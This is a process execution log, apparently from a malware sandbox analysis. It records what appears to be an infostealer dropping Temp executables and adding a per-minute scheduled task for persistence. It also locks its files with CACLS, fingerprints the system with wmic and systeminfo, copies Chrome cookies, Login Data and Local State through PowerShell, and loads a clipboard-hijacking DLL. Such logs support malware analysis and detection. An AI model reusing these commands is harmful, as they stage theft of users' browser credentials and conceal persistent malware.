tz9648.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe
2312v7412DB.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe
2756w78XP44.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe
2804xnmXr68.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe
2856schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
2120cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
2512cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2784cacls.exe CACLS "oneetx.exe" /P "test22:N"
2840cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
2216cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2412cacls.exe CACLS "..\c5d2db5804" /P "test22:N"
2720cacls.exe CACLS "..\c5d2db5804" /P "test22:R" /E
3016123dsss.exe "C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe"
2904Tarlatan.exe C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
2484Gmeyad.exe "C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe"
2876WMIC.exe wmic csproduct get uuid
2264WMIC.exe wmic os get Caption
184WMIC.exe wmic path win32_VideoController get name
288WMIC.exe wmic cpu get name
1780systeminfo.exe systeminfo
2992powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\test22\AppData\Local\Temp\XVlBzgbaiC\""
3140powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies\" \"C:\Users\test22\AppData\Local\Temp\MRAjWwhTHc\""
3300powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\tcuAxhxKQFDaFpL\""
3404powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\test22\AppData\Local\Temp\SjFbcXoEFf\""
3508powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\RsWxPLDnJObCsNV\""
3608powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\test22\AppData\Local\Temp\lgTeMaPEZQ\""
3704powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\leQYhYzRyWJjPjz\""
3800powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\test22\AppData\Local\Temp\pfRFEgmota\""
3896powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\FetHsbZRjxAwnwe\""
3992powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\krBEmfdzdc\""
4088powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\EkXBAkjQZLCtTMt\""
2504powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Microsoft\Windows\History\" \"C:\Users\test22\AppData\Local\Temp\TCoaNatyyi\""
1480w.exe "C:\Users\test22\AppData\Local\Temp\1000012001\w.exe"
1684tmpBEB8.exe "C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe"
3032rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
3356explorer.exe C:\Windows\Explorer.EXE
1236